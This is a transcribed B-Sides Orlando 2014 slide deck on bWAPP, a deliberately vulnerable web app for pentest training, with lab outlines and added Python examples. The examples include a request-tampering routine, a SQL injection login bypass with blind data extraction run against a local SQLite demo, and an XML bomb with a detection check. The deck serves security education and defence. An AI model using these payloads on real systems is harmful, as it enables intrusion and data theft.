B-Sides Orlando 2014 - Superbees Wanted
Post on 16-Apr-2017
What is bWAPP?
Defense Needed, Superbees Wanted
Malik Mesellem
What is bWAPP? | 2014 Malik Mesellem, all rights reserved.
About Me
Malik Mesellem
Email | malik@itsecgames.com
LinkedIn | be.linkedin.com/in/malikmesellem
Twitter | twitter.com/MME_IT
Blog | itsecgames.blogspot.com
Contents
Defense Needed
bWAPP & bee-box
Web App Pentesting
Hungry Evil Bees
Superbees Wanted
Defense Needed
Web application security is today's most overlooked aspect of securing the enterprise
Hackers are concentrating their efforts on websites and web applications
Web apps are an attractive target for cyber criminality, cyber warfare and hacktivism
Defense Needed
Why are web applications an attractive target?
Easily available via the Internet (24/7)
Mission-critical business applications with sensitive data
Often direct access to backend data
Traditional network firewalls and SSL provide no protection: an injection payload is a perfectly valid HTTP request, and encryption only hides it from inspection
Many applications are custom-made, and custom code is rarely reviewed as thoroughly as off-the-shelf software, so it is frequently vulnerable
DEFENSE is needed!
bWAPP == defense
bWAPP, or a buggy Web APPlication
Deliberately insecure web application, includes all major known web vulnerabilities
Helps security enthusiasts, developers and students to discover and to prevent issues
Prepares one for successful penetration testing and ethical hacking projects
bWAPP
Web application security is not just installing a firewall, or scanning a site for potential issues
Black-box penetration testing, simulating real attack scenarios, is still needed!
Confirms potential vulnerabilities, and excludes false positives
Verifies that your defense measures are actually working
bWAPP helps to improve your security-testing skills
OMG! Are we prepared for REAL attack scenarios???
bWAPP Testimonials
"Awesome! It's good to see fantastic tools staying up to date ..."
- Ed Skoudis, Founder of Counter Hack
"I just installed bWAPP 1.6 into the next release of SamuraiWTF ... It's a great app ..."
- Justin Searle, Managing Partner at UtiliSec
"Great progress on bWAPP BTW! :)"
- Vivek Ramachandran, Owner of SecurityTube
bWAPP Architecture
Open source PHP application
Backend MySQL database
Hosted on Linux/Windows Apache/IIS
Supported on WAMP or XAMPP
bWAPP Features (1)
Very easy to use and to understand
Well structured and documented PHP code
Different security levels (low/medium/high)
New user creation (password/secret)
Reset application/database feature
Manual intervention page
Email functionalities
bWAPP Features (2)
Local PHP settings file
No-authentication mode (A.I.M.)
Evil Bee mode, bypassing security checks
Evil directory, including attack scripts
WSDL file (Web Services/SOAP)
Fuzzing possibilities
bWAPP
What makes bWAPP so unique?
Well, it has over 70 web bugs!
Covering all major known web vulnerabilities
Including all risks from the OWASP Top 10 project
bWAPP
Which bug do you want to hack today? (1)
SQL, HTML, SSI, OS Command, XML, XPath, LDAP, PHP Code, Host Header and SMTP injections
Authentication, authorization and session management issues
Malicious, unrestricted file uploads and backdoor files
Arbitrary file access and directory traversals
PHP-CGI remote code execution
Local and remote file inclusions (LFI/RFI)
Server Side Request Forgery (SSRF)
bWAPP
Which bug do you want to hack today? (2)
Configuration issues: Man-in-the-Middle, Cross-Domain policy file, FTP, WebDAV, information disclosures,...
HTTP parameter pollution and HTTP response splitting
XML External Entity attacks (XXE)
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards
Denial-of-Service (DoS) attacks
bWAPP
Which bug do you want to hack today? (3)
Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)
AJAX and Web Services issues (JSON/XML/SOAP)
Parameter tampering and cookie poisoning
HTTP verb tampering
Local privilege escalation
And much more
bWAPP External links
Home page - www.itsecgames.com
Download location - sourceforge.net/projects/bwapp
Blog - itsecgames.blogspot.com
bee-box
Every bee needs a home: the bee-box
VM pre-installed with bWAPP
LAMP environment: Linux, Apache, MySQL and PHP
Compatible with VMware and VirtualBox
Requires zero installation
bee-box
bee-box is also made deliberately insecure
Opportunity to explore all bWAPP vulnerabilities
Gives you several ways to hack and deface bWAPP
Even possible to hack the bee-box to get full root access!
Hacking, defacing and exploiting without going to jail
You can download bee-box from the bWAPP download location (sourceforge.net/projects/bwapp)
bee-box Features (1)
Apache, MySQL and PHP installed
Several PHP extensions installed
Vulnerable PHP-CGI
phpMyAdmin installed
Postfix installed and configured
Insecure FTP and WebDAV configurations
AppArmor disabled
bee-box Features (2)
Weak self-signed SSL certificate
Fine-tuned file access permissions
.htaccess files support enabled
Some basic security tools installed
Shortcuts to start, install and update bWAPP
An amazing wallpaper
An outdated Linux kernel
bWAPP & bee-box
Both are part of the ITSEC GAMES project
A fun approach to IT security education
IT security, ethical hacking, training and fun...
All ingredients mixed together
Educational and recreational InfoSec training
bWAPP & bee-box
Ready, set, and hack!
There's just one thing to remember
The logon credentials are bee/bug
So please don't bug me anymore
bWAPP & bee-box
More credentials (for wizkids only!)
bWAPP web app: bee/bug
bee-box VM: bee/bug (su: bug)
MySQL database: root/bug
bWAPP & bee-box
Installation and configuration
Install VMware Player or Oracle VirtualBox
Extract, install, and start the bee-box VM
Configure or check the IP settings
Browse to the bWAPP web app
http://[IP]/bWAPP/
Login with bee/bug
bWAPP & bee-box
General application settings
settings.php, located under the bWAPP admin folder
Connection settings
SMTP settings
A.I.M. mode
Evil bee mode
Static credentials
bWAPP & bee-box
A.I.M., Authentication Is Missing: a no-authentication mode
May be used for testing web scanners and crawlers
Procedure
Change the IP address in the settings file
Point your web scanner or crawler to
http://[IP]/bWAPP/aim.php
All hell breaks loose
bWAPP & bee-box
Worst-case scenario options
Reset the application
http://[IP]/bWAPP/reset.php
Reset the application + database
http://[IP]/bWAPP/reset.php?secret=bWAPP
Reinstall the database
Drop the database from phpMyAdmin
http://[IP]/bWAPP/install.php
bWAPP & bee-box
Hosts file (optional)
Change the hosts file on the local machine so that a hostname resolves to the bee-box IP
bWAPP & bee-box
Postfix (optional)
Reconfigure and restart Postfix on the bee-box
sudo gedit /etc/postfix/main.cf
sudo /etc/init.d/postfix restart
Finally, time for a DEMO
Penetration Testing
Penetration testing, or pentesting
Method of evaluating computer, network or application security by simulating an attack
Active analysis of potential vulnerabilities by using ethical hacking techniques
Penetration tests are sometimes a component of a full security audit
Web App Penetration Testing
Web application pentesting focuses on evaluating the security of a web application
Application is tested for known web vulnerabilities
Manual, automatic and semi-automatic tests
Source code analysis and web server configuration review as an option
Web App Penetration Testing
It's all about identifying, exploiting, and reporting vulnerabilities
Some considerations
Commercial tools vs. open source tools
Not a best practice to rely on only one tool
Most commercial scanners don't exploit what they find, so their findings stay unconfirmed
False positives are not allowed!
People don't like auto-generated reports
Testing Methodologies
A simple testing methodology (diagram)
Testing Methodologies
A more advanced testing methodology (diagram)
OWASP
OWASP, or Open Web Application Security Project
Worldwide non-profit organization focused on improving the security of software
Freely-available articles, methodologies, documentation, tools, and technologies
Vendor neutral, no recommendations for commercial products or services!
OWASP
Current OWASP Projects
Top 10 Project and Testing Guide
Development and Code Review Guide
Application Security Verification Standard
Broken Web Applications (BWA)
Zed Attack Proxy (ZAP)
OWASP
OWASP Top 10 Project, lists the 10 most critical web application security risks
Updated every few years, latest version released in 2013
Referenced by many standards, books, tools, and organizations, including MITRE and PCI DSS
Good starting point for a web application pentest
What to test? How to test? How to prevent?
OWASP
OWASP Top 10 Application Security Risks (table)
OWASP Top 10: 2010 to 2013 changes (comparison table)
OWASP Top 10 placement (diagram)
Introduction to Kali Linux
Kali Linux is a Debian-derived Linux distribution
Designed for digital forensics and penetration testing
Successor to BackTrack
Maintained and funded by Offensive Security
Support for x86 and ARM
Introduction to Kali Linux
Includes many web app pentesting tools
Burp Suite
DirBuster
Metasploit
Nikto
sqlmap
w3af
WebSploit
ZAP
Hands-On Lab
Kali Linux - Installation and basic usage
Strongly advised to disable AV on the host (it flags the bundled attack tools)
Extract, install, and start the VM
VM network on Bridged (or NAT)
Login with root/toor
Check/configure IP and language settings
dhclient eth0 -v
Explore Kali Linux and its tools
When facing problems, ask for a LiveDVD...
Intercepting Proxies
Intercepting proxies are testing tools acting as a legitimate Man-in-the-Middle (MitM)
Located between the browser and the web application
Ability to intercept and to modify requests/responses
Provide a historical record of all requests
Include integrated tools to discover vulnerabilities, and to crawl and brute force files and directories
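Added example (not part of the deck, and not ZAP's code): the core of what an intercepting proxy does with a captured request, written in Python. It parses a raw HTTP/1.1 POST, lets the tester overwrite a cookie and a form field, and re-serializes the request with a corrected Content-Length, the step that is easiest to get wrong when editing a body by hand. The captured request, the bee-box address, the PHPSESSID value and the security_level cookie name are constructed assumptions for the illustration, not taken from the deck.

```python
"""Minimal request-tampering core of an intercepting proxy (added example,
not ZAP's or bWAPP's code).  Parse a captured request, let the tester edit
a cookie or a form field, and put it back on the wire with a correct
Content-Length."""
from urllib.parse import parse_qsl, urlencode

# Constructed sample request as the proxy would see it leaving the browser.
# Path, host address, session id and cookie name are assumptions.
RAW_REQUEST = (
    "POST /bWAPP/login.php HTTP/1.1\r\n"
    "Host: 192.168.56.101\r\n"
    "Cookie: PHPSESSID=0123456789abcdef; security_level=2\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 22\r\n"
    "\r\n"
    "login=bee&password=bug"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, version, ordered headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = []                       # keep order and duplicates, as a proxy must
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def get_header(req, name):
    for n, v in req["headers"]:
        if n.lower() == name.lower():  # header names are case-insensitive
            return v
    return None


def set_header(req, name, value):
    for i, (n, _) in enumerate(req["headers"]):
        if n.lower() == name.lower():
            req["headers"][i] = (n, value)
            return
    req["headers"].append((name, value))


def form_params(req):
    """Decoded fields of a urlencoded body."""
    return dict(parse_qsl(req["body"], keep_blank_values=True))


def tamper_cookie(req, name, value):
    """Overwrite (or add) one cookie and leave the others untouched."""
    cookies = {}
    for part in (get_header(req, "Cookie") or "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    cookies[name] = value
    set_header(req, "Cookie", "; ".join(f"{k}={v}" for k, v in cookies.items()))


def tamper_form_param(req, name, value):
    """Overwrite (or add) one form field, re-encode the body and fix Content-Length."""
    params = form_params(req)
    params[name] = value
    req["body"] = urlencode(params)    # handles quotes, spaces and '=' in the value
    set_header(req, "Content-Length", str(len(req["body"].encode("utf-8"))))


def serialize(req):
    """Rebuild the raw request exactly as it should go on the wire."""
    lines = [f"{req['method']} {req['path']} {req['version']}"]
    lines += [f"{n}: {v}" for n, v in req["headers"]]
    return "\r\n".join(lines) + "\r\n\r\n" + req["body"]


def tampered_request():
    """Worked run from the lab: drop the security level to low and replace the password."""
    req = parse_request(RAW_REQUEST)
    tamper_cookie(req, "security_level", "0")
    tamper_form_param(req, "password", "' OR '1'='1")
    return serialize(req)


if __name__ == "__main__":
    print(tampered_request())
```

A real proxy adds the TLS termination and the socket plumbing around this; the parsing and re-serialization above is the part the tester actually interacts with, and the Content-Length recalculation is why editing the body in the proxy UI works where editing it in a text editor usually does not.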
Intercepting Proxies
ZAP, Zed Attack Proxy
OWASP project, by Simon Bennetts
Java application, released in September 2010
Fork of the Paros intercepting proxy
Pentesting tool for finding vulnerabilities
Provides automated scanning, as well as a set of tools to find security vulnerabilities manually
Intercepting Proxies
ZAP, Zed Attack Proxy: functionalities
Intercepting proxy, listening on TCP/8080
Traditional and AJAX spider
Automated and passive scanner
Fuzzing and brute force capabilities
Smartcard and client certificate support
Authentication and session support
Demo: ZAP, Zed Attack Proxy
Parameter/cookie tampering
Online password attack
Vulnerability detection
Hands-On Lab: ZAP, Zed Attack Proxy
Parameter/cookie tampering
Online password attack
Vulnerability detection
Commercial Web Scanners
Netsparker
Automated web security scanner, marketed as "false positive free"
Identifies security issues and vulnerabilities such as SQL injection and Cross-Site Scripting (XSS)
Automatically exploits detected vulnerabilities to confirm them, so that no false positives are reported
Site: https://www.netsparker.com/
Hands-On Lab: Netsparker
Non-authenticated scan
Authenticated scan
Ready to EXPLOIT some bugs?
Hungry Evil Bees
Hacking, Defacing and Exploiting
SQL / HTML / SSI Injection
Cross-Site Scripting (XSS)
Denial-of-Service (DoS)
PHP-CGI Remote Code Execution
Unrestricted File Uploads
File Inclusions (LFI/RFI)
Local Privilege Escalation
Hands-On Lab: SQL Injection
Bypassing login forms
Manually extracting data
Testing for blind SQL injection
Automated SQL injection
Website defacement
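Added example (not bWAPP's PHP, and not the deck's demo): the login-form SQL injection this lab walks through, reproduced in Python against an in-memory SQLite table. It puts the vulnerable string-built query beside its parameterized fix, and adds a boolean-based blind extraction that recovers a column one character at a time using nothing but the login's yes/no answer, the same signal the "testing for blind SQL injection" step relies on. The users table, its columns and the admin row are constructed for the demo; only bee/bug comes from the deck.

```python
"""Login-form SQL injection, vulnerable vs. fixed, plus boolean-based blind
extraction (added example, not bWAPP's code).  SQLite is used so the whole
thing runs offline; the table and its rows are constructed."""
import sqlite3


def make_db():
    """Constructed users table; bee/bug mirrors the deck's demo credentials."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (login TEXT, password TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("bee", "bug", "Any bugs?"),
        ("admin", "c0ffee!", "Honey pot"),
    ])
    return con


def login_vulnerable(con, login, password):
    """Low security level: user input is pasted straight into the SQL text."""
    sql = (f"SELECT login FROM users WHERE login = '{login}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, login, password):
    """The fix: placeholders ship the values separately from the statement,
    so a quote in the input can no longer change the query's structure."""
    row = con.execute(
        "SELECT login FROM users WHERE login = ? AND password = ?",
        (login, password),
    ).fetchone()
    return row[0] if row else None


BYPASS = "' OR '1'='1"   # classic tautology payload, entered in both fields


def blind_extract(con, column, victim, max_len=64):
    """Boolean-based blind SQLi: recover users.<column> of `victim` one
    character at a time.  The only oracle is whether the login succeeds:
    (login='x' AND password='x') OR (substr(col,pos,1)=ch) is true only on a hit."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):           # printable ASCII
            ch = chr(code)
            if ch == "'":                     # would break the quoting; skipped here
                continue
            probe = (f"x' OR (SELECT substr({column},{pos},1) FROM users "
                     f"WHERE login='{victim}')='{ch}")
            if login_vulnerable(con, "x", probe) is not None:
                recovered += ch
                break
        else:
            break                             # nothing matched: end of the value
    return recovered


if __name__ == "__main__":
    con = make_db()
    print("vulnerable login with payload:", login_vulnerable(con, BYPASS, BYPASS))
    print("parameterized login with payload:", login_safe(con, BYPASS, BYPASS))
    print("admin secret via blind extraction:", blind_extract(con, "secret", "admin"))
```

The blind loop is what sqlmap automates (with a smarter search than a linear scan over the alphabet); seeing it spelled out makes clear why a "false positives are not allowed" pentest confirms the injection by extracting something the tester could not otherwise know.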
Hands-On Lab: HTML Injection
Website defacement
Page redirection
Phishing attack
Client-side exploitation
Hands-On Lab: SSI Injection
Disclosing sensitive files
Website defacement
Shell access
Hands-On Lab: Cross-Site Scripting
Detecting XSS
Session hijacking
Hands-On Lab: Denial-of-Service
HTTP Slow POST
XML Bomb
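Added example (not from the deck or bWAPP): the XML bomb named above, scaled down to three levels, together with a Python check that computes how far a document's internal DTD entities would expand and refuses it before the XML parser ever allocates the result. The sample document is constructed for the illustration, and the size budget is an assumed policy value.

```python
"""'Billion laughs' XML bomb, scaled down, and a pre-parse expansion check
(added example, not from the deck).  The check sizes the expansion from the
entity declarations alone, so it costs a few dictionary lookups instead of
the gigabytes the parser would otherwise try to build."""
import re

# Constructed: 3 levels x 10 references.  The real bomb uses 9 levels, which
# turns a 3-byte "lol" into 3 * 10**9 bytes when the parser expands &lol9;.
LOL_XML = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')  # internal entities only
ENTITY_REF = re.compile(r"&(\w+);")


def internal_entities(xml):
    """name -> replacement text for each internal general entity in the DTD.
    SYSTEM/PUBLIC (external) entities are deliberately not matched."""
    return dict(ENTITY_DECL.findall(xml))


def expanded_size(name, entities, memo=None, stack=()):
    """Bytes produced by fully expanding &name;, computed without building the
    string: literal characters plus the expanded size of each reference.
    Recursive definitions are illegal XML and are reported as an error."""
    memo = {} if memo is None else memo
    if name in stack:
        raise ValueError(f"recursive entity definition: {name}")
    if name in memo:
        return memo[name]
    text = entities.get(name)
    if text is None:
        return len(name) + 2              # undeclared or predefined (&amp;): left as written
    literal = len(ENTITY_REF.sub("", text))
    total = literal + sum(expanded_size(r, entities, memo, stack + (name,))
                          for r in ENTITY_REF.findall(text))
    memo[name] = total
    return total


def body_expansion(xml):
    """Total bytes the entity references in the document body expand to."""
    entities = internal_entities(xml)
    body = xml[xml.rfind("]>") + 2:] if "]>" in xml else xml   # skip the internal subset
    memo = {}
    return sum(expanded_size(r, entities, memo) for r in ENTITY_REF.findall(body))


def safe_to_parse(xml, max_expansion=1_000_000, allow_dtd=False):
    """Gate to run on the raw bytes before handing them to an XML parser.
    Refusing any DTD (the default) also shuts the door on XXE; when DTDs are
    genuinely needed, cap the expansion instead."""
    if "<!DOCTYPE" in xml and not allow_dtd:
        return False
    try:
        return body_expansion(xml) <= max_expansion
    except ValueError:                    # recursive entities: refuse
        return False


if __name__ == "__main__":
    print("document bytes:", len(LOL_XML))
    print("expands to:", body_expansion(LOL_XML))
    print("accepted with DTDs allowed:", safe_to_parse(LOL_XML, allow_dtd=True))
```

The same `allow_dtd=False` default is the one-line answer to the XXE item earlier in the deck: a parser that never sees a DOCTYPE can neither expand a bomb nor resolve an external entity.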
Hands-On Lab: PHP-CGI Remote Code Execution
API and PHP version verification
Source code disclosure
Website defacement
OWASP ZAP
Metasploit
Hands-On Lab: Unrestricted File Uploads
Web shell creation
Shell access, evading firewalls
Website defacement
Hands-On Lab: File Inclusions
Disclosing sensitive files
Website defacement
Shell access, evading firewalls
Escalating privileges...
Superbees Wanted
Hi little bees, during this workshop we:
Defaced your website 5 times
Compromised your server
Compromised your clients
Made your server unreachable
Hijacked your session
Stole your credentials
And we have so many more bugs to exploit
Definitely time to improve your web security
Defense is needed, and testing is required!
Downloading bWAPP is a first start
Remember: every bee needs a superbee
Are you that superbee?
@MME_IT #bWAPP
Contact Me
Malik Mesellem
Email | malik@itsecgames.com
LinkedIn | be.linkedin.com/in/malikmesellem
Twitter | twitter.com/MME_IT
Blog | itsecgames.blogspot.com
Cheat Sheet
Hi little bees, we have a cheat sheet for you
Containing all bWAPP solutions
Follow us on Twitter, and ask for our cheat sheet
You will definitely become a superbee!
@MME_IT #bWAPP
Training
Attacking & Defending Web Apps with bWAPP
2-day comprehensive web security course
Focus on attack and defense techniques!
More info: http://goo.gl/ASuPa1 (pdf)